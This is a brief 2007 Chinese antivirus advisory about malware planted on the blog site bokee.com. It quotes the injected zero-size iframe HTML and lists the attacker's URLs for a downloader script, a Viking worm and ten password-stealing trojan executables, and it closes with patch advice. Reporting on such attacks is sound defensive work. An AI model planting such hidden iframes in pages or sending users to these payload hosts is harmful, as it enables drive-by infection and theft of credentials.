|
2007-3-17日,安天实验室反病毒监测网发现民间安全技术网站“博客网”
(http://www.bokee.com/)被植入病毒,用户浏览该网站时将被感染病毒。该站点,
日访问流量较大。所挂病毒会引起,受感染的系统被远程控制,因此具有较大的危害性。
首先首页被嵌入标识语言HTML代码<iframe src="http://www.cw988.cn/index_01.htm"
width="0" height="0" frameborder="0"></iframe>,以致让浏览者正常浏览的情况下
同时打开http://www.cw988.cn/index_01.htm。同时还在嵌入到首页的JS文件中写入恶
意代码:http://www.cw988.cn/temp.js 。代码运行后自动下载并执行http://www1.c**88.cn/avp.exe
(avp.exe:Worm.Win32.Viking.ix)
avp.exe运行后,会
从网站http://www1.cw988.cn/下载10文件如下:
http://www1.c**88.cn/f1.exe
http://www1.c**88.cn/f2.exe
... ...
http://www1.c**88.cn/f10.exe
经分析均为Trojan-PSW类木马,可以盗取用户敏感信息。
安天实验室提醒广大用户:请广大用户及时通过使用微软自动更新服务或在微软更新
网站上下载更新程序的方式,安装该漏洞的补丁.安天实验室为了方便广大木马防线用户,
已经在木马防线2005+中,提供了这些更新程序的下载链接,请用户及时下载并升级您的
木马防线,保护系统的安全。
|
内容:
病毒上报信箱: